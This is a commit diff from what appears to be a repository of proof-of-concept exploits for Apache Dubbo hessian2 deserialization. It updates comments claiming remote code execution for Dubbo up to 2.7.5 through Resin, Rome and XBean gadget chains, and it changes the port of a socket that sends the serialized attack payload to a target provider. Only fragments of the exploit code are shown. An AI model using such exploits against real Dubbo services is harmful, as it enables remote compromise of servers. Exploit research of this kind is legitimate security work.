feat:更新xbean poc说明

Author: threedr3am

dubbo/src/main/java/com/threedr3am/bug/dubbo/ResinPoc.java

@@ -21,8 +21,6 @@
 /**
  * dubbo 默认配置，即hessian2反序列化，都可RCE（dubbo版本<=2.7.5）
  *
- * Spring和Spring boot环境下都能打
- *
  * <dependency>
  *    <groupId>com.caucho</groupId>
  *    <artifactId>quercus</artifactId>

dubbo/src/main/java/com/threedr3am/bug/dubbo/RomePoc.java

@@ -20,9 +20,6 @@
 /**
  * dubbo 默认配置，即hessian2反序列化，都可RCE（dubbo版本<=2.7.5）
  *
- * Spring和Spring boot环境下都能打
- *
- *
  * <dependency>
  *    <groupId>com.rometools</groupId>
  *    <artifactId>rome</artifactId>

dubbo/src/main/java/com/threedr3am/bug/dubbo/XBeanPoc.java

@@ -13,14 +13,11 @@
 import javax.naming.Context;
 import javax.naming.Reference;
 import org.apache.dubbo.common.io.Bytes;
-import org.apache.dubbo.common.serialize.Cleanable;
 import org.apache.xbean.naming.context.ContextUtil.ReadOnlyBinding;
 import org.apache.xbean.naming.context.WritableContext;
 
 /**
- * dubbo 默认配置，即hessian2反序列化，都可RCE
- *
- * 需要dubbo环境版本<=2.6.3
+ * dubbo 默认配置，即hessian2反序列化，都可RCE（dubbo版本<=2.7.5）
  *
  * <dependency>
  *   <groupId>org.apache.xbean</groupId>
@@ -80,7 +77,7 @@ public static void main(String[] args) throws Exception {
     byte[] bytes = byteArrayOutputStream.toByteArray();
 
     //todo 此处填写被攻击的dubbo服务提供者地址和端口
-    Socket socket = new Socket("127.0.0.1", 20881);
+    Socket socket = new Socket("127.0.0.1", 20880);
     OutputStream outputStream = socket.getOutputStream();
     outputStream.write(bytes);
     outputStream.flush();